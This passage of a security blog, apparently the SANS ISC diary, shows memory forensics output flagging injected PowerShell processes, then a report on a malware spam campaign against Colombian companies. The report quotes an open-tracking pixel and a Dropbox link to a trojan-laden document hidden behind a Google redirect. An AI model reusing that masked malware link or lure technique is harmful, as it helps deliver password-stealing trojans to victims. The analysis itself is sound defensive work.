0x13e81acb0        UDPv4    0.0.0.0:0    *:*                                   1284     powershell.exe 2015-04-26 18:17:33 UTC+0000

Suspicious new pslist entries
===========================================================================

0xfffffa8031da1400 cmd.exe                1676   2396      0 --------      1      0 2015-04-26 18:11:52 UTC+0000   2015-04-26 18:15:50 UTC+0000  
0xfffffa8033b17060 powershell.exe         2604   1676      5      250      1      1 2015-04-26 18:12:58 UTC+0000  
0xfffffa80322c2060 cmd.exe                2912   1284      0 --------      1      0 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0xfffffa8032407460 powershell.exe         1984   2912      6      235      1      0 2015-04-26 19:18:20 UTC+0000                                 

Suspicious new psscan entries
===========================================================================

0x000000013eac2060 cmd.exe            2912   1284 0x0000000055564000 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                                 
0x000000013f6a8060 cmd.exe            2288   1284 0x000000006dd6f000 2015-04-26 19:19:44 UTC+0000   2015-04-26 19:55:20 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                

Suspicious new ldrmodules entries
===========================================================================

 1284 powershell.exe       0x000000006df70000 False  False  False \Windows\SysWOW64\schannel.dll
 2396 powershell.exe       0x000000006e010000 False  False  False \Windows\SysWOW64\credssp.dll
 
Suspicious new executables
===========================================================================

powershell

Suspicious new malfind entries
===========================================================================

Process: powershell.exe Pid: 2396 Address: 0x6400000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 216, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x06400000  4d 5a e8 00 00 00 00 5b 52 45 55 89 e5 81 c3 d0   MZ.....[REU.....

Process: powershell.exe Pid: 1284 Address: 0x4ff0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 33, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x04ff0000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............

Suspicious new getsids entries
===========================================================================
 
powershell.exe (1284): S-1-5-21-1828531342-1736868966-1560356964-513 (Domain Users)
powershell.exe (1284): S-1-1-0 (Everyone)
powershell.exe (1284): S-1-5-114
powershell.exe (1284): S-1-5-32-544 (Administrators)
powershell.exe (1284): S-1-5-32-545 (Users)
powershell.exe (1284): S-1-5-4 (Interactive)
powershell.exe (1284): S-1-2-1 (Console Logon (Users who are logged onto the physical console))
powershell.exe (1284): S-1-5-11 (Authenticated Users)
powershell.exe (1284): S-1-5-15 (This Organization)
powershell.exe (1284): S-1-5-113
powershell.exe (1284): S-1-5-5-0-194227 (Logon Session)
powershell.exe (1284): S-1-2-0 (Local (Users with the ability to log in locally))
powershell.exe (1284): S-1-5-64-10 (NTLM Authentication)
powershell.exe (1284): S-1-16-12288 (High Mandatory Level) 

Yep, powershell.exe definitely did it. :-) Great memory analysis tool from Houcem Hachicha (@aim4r). Give it a try!

Pop quiz: Under the malfind results, in the ASCII readable output dumped from the hex, what jumps out at you? First right answer to @sans_isc and @holisticinfosec in the same Tweet, one per reader, wins some insignificant yet enjoyable schwag.
Cheers!

Russ McRee | @holisticinfosec

0 Comments

Published: 2015-05-01

Massive malware spam campain to corporate domains in Colombia

There was a massive malware spam campain directed to corporate domains in Colombia. The following was the e-mail received:

ACH spam e-mail

Now this e-mail has two interesting aspects:

  • It is tracking if the user reads the message using the google analytics API by invoking the following:
    img src=3Dhttp://www.google-analytics.com/c=
    ollect?v=3D1&tid=3DUA-62115737-1&cid=3Dxx@xx.com&t=3De=
    vent&ec=3Dxx@xx.com&ea=3Dopens&el=3Dxx@xx.com&cs=3Dnewsletter&cm=3Demail&cn=3D062413&cm1=3D1?/
    
  • It has a link to a dropbox file being masqueraded with the google url redirection script:
    https://www.google.com/url?q=3Dhttps%3A%2F%=
    2Fwww.dropbox.com%2Fs%2Fvs5hho625v7ibw5%2FACH=5Ftransaction5721.doc%3Fdl%3D=
    1&sa=3DD&sntz=3D1&usg=3DAFQjCNFADf1fsGqdWqwSOnMC6XyLMHrL2w

When opened, this document has embedded a visual basic script that downloads a known trojan password stealer designed for colombian banks.

This domain uses a private registation service, avoiding to know the identity of the registrar:

frterminales private registration

Be careful when opening unknown e-mails. You could be leaking information and compromising your computer, even when you see google domain in the URLs.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

6 Comments